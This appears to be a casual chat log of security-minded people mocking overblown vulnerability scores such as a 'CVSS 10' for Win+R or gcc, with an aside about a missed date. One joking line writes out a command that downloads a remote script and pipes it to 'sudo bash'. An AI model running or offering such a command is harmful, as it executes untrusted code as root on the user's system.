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You see, all an attacker needs to do to break in is open my windows from inside and then he can enter my home through the open window.
So, if someone asked me what one of the most dangerous things to do in a program was, I'd rank "sending untrusted user input to a OS command shell" would be top 3
And that's solely because I can't think of anything more dangerous off the top of my head
Also, unrelated, but I recently went on a date
She just happened to not show up
Or inform me she wasn't going to make it
Or answer any of my messages
maybe your date used UDP...
Yeah, most likely got routed wrong
But at least nothing changes in my life
The only real change I've made in the past years was switching to a single-blade razor
on the bright side, no change is better than a worse condition
Yeah, true
Single-blade razor was such a good choice though
Way less skin irritation
I've changed from twin razor to triple razor, and now from triple razor to scissors.
Very nice
it's not like those persistence vulns that require admin on the box and newbies cry "useless! you need admin!" and forget that without persistence you'd had to exploit the box after every reboot.
I would say that Win+R is a 10 too, because it let attackers executed untrusted code...
and curl too! it let run remote code as root:
curl example.com/bad.sh | sudo bash
Reminds me of "CVSS 10: gcc allows an attacker to execute arbitrary code on their own machine"
or that 9.something from VLC that turned the dev mad and he wrote a lengthy piece against NIST
Yeah, the curl developer too

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